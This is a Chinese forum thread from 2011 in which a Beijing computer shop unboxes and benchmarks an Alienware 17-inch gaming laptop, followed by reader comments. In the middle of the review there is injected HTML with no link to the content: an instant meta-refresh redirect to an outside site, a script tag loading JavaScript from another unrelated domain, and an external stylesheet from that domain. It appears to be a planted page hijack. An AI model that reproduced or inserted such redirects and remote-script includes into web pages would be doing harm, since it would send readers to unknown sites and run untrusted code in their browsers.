开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

快来看啊——外星人降临翔意(新增3DMark测试成绩)

硕大的包装箱,赶上台式机主机大小了

里面有什么玄机呢

第一层是随机的附件,机器在下面,两侧设计了个提手方便拿出来,很贴心。

绒布的外衣下包裹着外星人

首先映入眼帘的是鼠标垫和适配器,适配器看起来非常大

摊开来,分别是鼠标垫、Logo、鸭舌帽、光盘、适配器、用户手册和电源线

鼠标垫质感不错

附送了两张光盘和一本用户手册

适配器为电源大厂台达代工。没有明确标注功率。但根据电压和电流计算功率在240W左右

现在准备解剖外星人

第一感觉就是——重和厚

底部两个硕大的散热孔,游戏机型,双风扇很正常了

电池也比普通笔记本电池大不少,容量为90Wh

正面两侧为音箱,线条看起来非常动感

17寸镜面屏,个人不是很喜欢镜面的,会反光

背光键盘,17寸这么大的尺寸,完全容纳下数字小键盘

机身左侧依次为安全锁孔、RJ45、GVA、HDMI输出、miniDisPort、USB3.0x2和音频接口

机身后部比较简洁,两侧是散热孔,中间为电源适配器接口

机身右侧是吸入式光驱,吸入式光驱上方是读卡器、USB2.0x2、USB&eSATA接口以及HDMI输入

开机之后,触摸板的蓝光非常好看。键盘其实也是背光,但是光线强的时候看起来不明显

黑暗中的背光键盘

搭配的系统为家庭高级版

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

分辨率为1920*1080显卡,双显卡,独显为AMD Radeon 6900M

算得上是笔记本里最好的显卡之一了,1120个流处理器,2G显存,256位宽。核心面积255平方毫米。

处理器为I7-2760QM,四核心八线程,6M三级缓存。搭配2*2GB DDR3 1600,四个内存插槽。

8个核心啊,有木有,可惜不是固态硬盘

AIDA64检测系统详细信息,硬盘为750G

内存带宽

除了硬盘全部都在7.5分以上,配上SSD就完美了。

拍照的是黑音么,露了半个脸
黑音 发表于 2011-11-3 15:21
沙发预留

沙发被我占了
木有关系。
黑音 发表于 2011-11-3 15:25
木有关系。

那甚好,不用不安了
我兄弟在加拿大就是这个怪物
一切为了游戏而生。大家按需求选择,不过我还是更喜欢游戏机+电脑的组合。
手机党没流量看不到图
牛机。。。
EddieFan 发表于 2011-11-3 15:42
一切为了游戏而生。大家按需求选择,不过我还是更喜欢游戏机+电脑的组合。 ...

我的想法同ld,电脑再好,玩游戏比不上游戏机,性价比也差
翔意能不能来个这家伙与W520、Pro17的性能比较啊
游戏机和专业画图机,没法比吧。。。
太大              
果然强机啊
谁的呀,买了干啥呢?
CPU和主板是台式机的么
牛机机。。。
这玩意砸人肯定爽
纳闷 同样的价格能搞一台顶配台式了  发烧啊~~~~~~~~~~
谁买的??
太猛了。。。。
xy以后要卖这个了么
这个机子多少起??
玩游戏还是装一个台式机好。